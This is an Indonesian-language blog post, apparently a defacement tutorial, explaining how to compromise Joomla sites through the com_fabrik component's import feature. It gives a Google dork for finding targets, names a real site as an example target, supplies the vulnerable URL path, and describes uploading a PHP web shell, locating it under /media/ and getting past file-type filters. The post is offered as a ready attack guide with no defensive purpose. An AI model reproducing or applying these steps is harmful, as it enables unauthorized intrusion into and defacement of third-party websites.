1. Langsung saja, pertama paste kan dork nya ke google, Dork nya adalah :
Quote:inurl:index.php?option=com_fabrik or index.php?option=com_fabrik
2. Kemudian lihat satu-satu web disana untuk kita coba, misalkan kita mendapat kan target nya di google contoh nya di bawah ini:
Quote:http://www.scb.travel/index.php?option=c...&Itemid=85
3. Maka pastekan Vulnerable path nya di depan Url, Vulnerable path nya adalah ini :
Quote:index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jadi nya Url target kita di atas menjadi seperti di bawah ini :
Quote:http://www.scb.travel/index.php?option=c...sv&table=1
5. nah disana kita bisa melihat ada tempat upload sesuatu, kita bisa mengupload shell langsung, type nya yg di dukung adalah :
Quote:php,asp,html,jpg
6. setelah anda upload maka nanti shell nya akan ada di dalam folder :
http://[target]/media/shellkamu.php
Jika Shell .php nya tidak bisa, anda bisa menggunakan atau bypass type nya, krn type yang di dukung seperti yg saya bilang di atas : php,asp,html,jpg. Sudah sangat jelas kawan Jika tidak bisa juga, coba dengan cara Temper data klo g bisa juga tendang aja web nya dan cari lain kkkkkkkkkkkkk..
Semoga bermanfaat ya
Thansk To : ChilzAceh
0 Response to " Deface CMS Joomla Joomla Remote Shell Upload Vulnerability"
Posting Komentar